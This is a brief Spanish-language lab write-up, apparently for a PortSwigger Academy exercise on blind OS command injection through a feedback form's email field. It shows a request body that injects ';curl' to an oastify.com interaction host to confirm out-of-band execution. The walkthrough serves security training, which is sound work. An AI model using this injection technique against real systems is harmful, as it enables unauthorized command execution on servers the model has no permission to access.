Blind OS command injection with out-of-band interaction
![[20251009015645.png]](/assets/20251009015645.CNvwX5CG.png)
En el sitio web encontraremos un apartado de enviar nuestro feedback.
![[20251009015905.png]](/assets/20251009015905.DsPjE7qx.png)
Interceptando el trafico observaremos que en el parámetro de email podemos agregar un ; y ejecutar comandos.
![[20251009015921.png]](/assets/20251009015921.Ci9HZQ2h.png)
c
csrf=rwaipPdZO90i7r5TqmXJfY3DzGM2nAfI&name=test&email=x;curl+http://5pva10p7hj4l34zaisfc3fry1p7gvbj0.oastify.com;&subject=test&message=testAl tener una ejecución ciega, podemos enviarnos un curl.
![[20251009020054.png]](/assets/20251009020054.CSOTN5DT.png)
![[20251009020026.png]](/assets/20251009020026.xSWhxczW.png)
Asi podremos ejecutar comandos